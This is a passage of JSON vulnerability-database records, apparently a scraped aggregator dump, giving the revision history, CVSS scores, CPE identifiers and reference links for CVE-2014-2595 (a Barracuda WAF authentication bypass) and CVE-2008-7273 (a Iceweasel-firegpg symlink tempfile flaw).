{"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}, {"hash": "ee2d931efb4c4fa7a1a321df76c0b838", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-21T13:06:26", "modified": "2020-02-20T15:55:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 47}, "differentElements": ["cvss3", "affectedSoftware"], "edition": 4, "lastseen": "2020-02-21T13:06:26"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "enchantments": {"dependencies": {"modified": "2021-02-02T06:14:28", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2021-02-02T06:14:28", "rev": 2, "value": 6.9, "vector": "NONE"}}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004"}, {"name": "http://www.osvdb.org/109782", "refsource": "MISC", "tags": ["Broken Link"], "url": "http://www.osvdb.org/109782"}, {"name": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "refsource": "MISC", "tags": ["Broken Link"], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/"}, {"name": "https://www.exploit-db.com/exploits/39278", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/39278"}, {"name": "https://www.securityfocus.com/bid/69028", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.securityfocus.com/bid/69028"}, {"name": "http://seclists.org/fulldisclosure/2014/Aug/5", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://seclists.org/fulldisclosure/2014/Aug/5"}], "hash": "d6e72c33ebf3accfe25046812d0b1e7698f2d37c9159defa7c7bda26e2ab359b", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "0e66a595df2112e69adac8e55cbdb92d", "key": "cpeConfiguration"}, {"hash": "a97b191a26cb922c0b82d26c5f04f4db", "key": "affectedSoftware"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "073d5951cb97bd54baf9ef00e5950ef4", "key": "extraReferences"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "immutableFields": [], "lastseen": "2021-02-02T06:14:28", "modified": "2020-02-20T15:55:00", "objectVersion": "1.5", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 60}, "different_elements": ["cpeConfiguration"], "edition": 7, "lastseen": "2021-02-02T06:14:28"}], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "enchantments": {"dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13887", "SECURITYVULNS:DOC:31004"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:127740"]}, {"type": "exploitdb", "idList": ["EDB-ID:39278"]}], "modified": "2021-04-22T23:44:08", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-04-22T23:44:08", "rev": 2}}, "type": "cve", "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "a97b191a26cb922c0b82d26c5f04f4db"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "832b9c21b4589969549f63eb0724398c"}, {"key": "cpe23", "hash": "405ecfc0fb244283a2773863614145bf"}, {"key": "cpeConfiguration", "hash": "238f536d7ccbcb60d24ab76ed2548b8b"}, {"key": "cvelist", "hash": "afd8c4a8002c25596504fc1efc107886"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "e63509ce8b627fb239a5a63969122026"}, {"key": "cvss3", "hash": "ad35358d166de03a84a3a9280d95337a"}, {"key": "cwe", "hash": "86870277fcb3e3e121fe9e4f1f7c2b51"}, {"key": "description", "hash": "584cd9e6927eaaa814c6545414f09911"}, {"key": "extraReferences", "hash": "073d5951cb97bd54baf9ef00e5950ef4"}, {"key": "href", "hash": "756bd44ad36e62b951b7a08611cbd3f5"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "92ee34fefd5301ff6ccb77b813c8d4f8"}, {"key": "published", "hash": "6c607768196e3786ab17cb3a6e516cad"}, {"key": "references", "hash": "cf46dbeffc0c7dc51130bcd388b4459a"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "bc7f8fc71017e1124d57947313af5643"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "scheme": null, "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cwe": ["CWE-613"], "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004"}, {"name": "http://www.osvdb.org/109782", "refsource": "MISC", "tags": ["Broken Link"], "url": "http://www.osvdb.org/109782"}, {"name": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "refsource": "MISC", "tags": ["Broken Link"], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/"}, {"name": "https://www.exploit-db.com/exploits/39278", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/39278"}, {"name": "https://www.securityfocus.com/bid/69028", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.securityfocus.com/bid/69028"}, {"name": "http://seclists.org/fulldisclosure/2014/Aug/5", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://seclists.org/fulldisclosure/2014/Aug/5"}], "immutableFields": []}, {"id": "CVE-2008-7273", "bulletinFamily": "NVD", "title": "CVE-2008-7273", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "published": "2019-11-18T22:15:00", "modified": "2019-11-20T15:56:00", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "reporter": "cve@mitre.org", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "cvelist": ["CVE-2008-7273"], "type": "cve", "lastseen": "2021-04-21T20:41:43", "history": [{"bulletin": {"affectedSoftware": [{"name": "getfiregpg iceweasel-firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:iceweasel-firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 3, "enchantments": {"dependencies": {"modified": "2019-12-18T13:57:06", "references": [], "rev": 2}, "score": {"modified": "2019-12-18T13:57:06", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "d61e8c253c1f5d35ed5977532afcfe58d323a03057be4323e8c19bd7bed39d26", "hashmap": [{"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "3e1e24cf5fed13b85f5534cb239a1044", "key": "cpe"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "4464888dd8ea79b7344278e86594f061", "key": "affectedSoftware"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2019-12-18T13:57:06", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 62}, "differentElements": ["cvss3", "cpe", "affectedSoftware"], "edition": 3, "lastseen": "2019-12-18T13:57:06"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T13:59:22", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T13:59:22", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "557fd4cb813bf4897b5fdca93f953d2fe22dd9fed46f9a924ed2d03719983a4f", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-09-21T13:59:22", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 62}, "differentElements": ["cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T13:59:22"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "enchantments": {"dependencies": {"modified": "2020-12-09T19:28:28", "references": [], "rev": 2}, "score": {"modified": "2020-12-09T19:28:28", "rev": 2, "value": 1.2, "vector": "NONE"}}, "extraReferences": [], "hash": "3f2537e658f4240fe6f7df8e451ce685d2ca8ba79fbda529c1842e690c507e37", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-12-09T19:28:28", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 76}, "differentElements": ["extraReferences"], "edition": 7, "lastseen": "2020-12-09T19:28:28"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-10-03T11:51:06", "references": [], "rev": 2}, "score": {"modified": "2020-10-03T11:51:06", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "3f49259ae0555553bcbf3433a53f5984d6de287f6d865e78b449bda3b88b8ea7", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-10-03T11:51:06", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 72}, "differentElements": ["affectedSoftware"], "edition": 5, "lastseen": "2020-10-03T11:51:06"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": 